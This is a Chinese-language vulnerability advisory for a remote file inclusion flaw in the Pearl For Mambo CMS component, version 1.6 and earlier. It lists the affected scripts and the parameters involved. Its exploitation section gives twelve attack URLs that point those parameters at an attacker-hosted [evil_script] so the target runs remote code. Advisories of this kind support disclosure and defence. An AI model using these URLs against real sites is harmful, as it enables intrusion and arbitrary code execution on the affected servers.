添加时间:
2008-10-03

系统编号:
WAVDB-00976
BUGTRAQ: 18690

影响版本:
Pearlinger Pearl For Mambo <= 1.6

程序介绍:

Mambo是免费的功能强大的开放源码内容管理系统，Pearl For Mambo是可以无缝的集成于Mambo的一个组件。

漏洞分析:

Pearl For Mambo允许远程攻击者使用phpbb_root_path或GlobalSettings[templatesDirectory]参数向多个脚本发送特制的URL请求，导致指定远程系统的恶意文件，在有漏洞的系统上执行任意代码。
以下脚本受这个漏洞影响：
includes/functions_cms.php
includes/adminSensored.php
includes/adminBoards.php
includes/adminAttachments.php
includes/adminAvatars.php
includes/adminBackupdatabase.php
includes/adminBanned.php
includes/adminForums.php
includes/adminPolls.php
includes/adminSmileys.php
includes/poll.php includes/move.php

漏洞利用:

http://www.site.com/[path]/includes/functions_cms.php?phpbb_root_path=[evil_script] 
http://www.site.com/[path]/includes/adminSensored.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminBoards.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminAttachments.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminAvatars.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminBackupdatabase.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminBanned.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminForums.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminPolls.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/adminSmileys.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/poll.php?GlobalSettings[templatesDirectory]=[evil_script]
http://www.site.com/[path]/includes/move.php?GlobalSettings[templatesDirectory]=[evil_script]

解决方案:
厂商补丁：
Pearlinger
----------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：
http://www.pearlinger.com/

信息来源:
<*来源：Kw3rLn （ciriboflacs@YaHoo.Com）
链接：http://www.milw0rm.com/exploits/1956
*>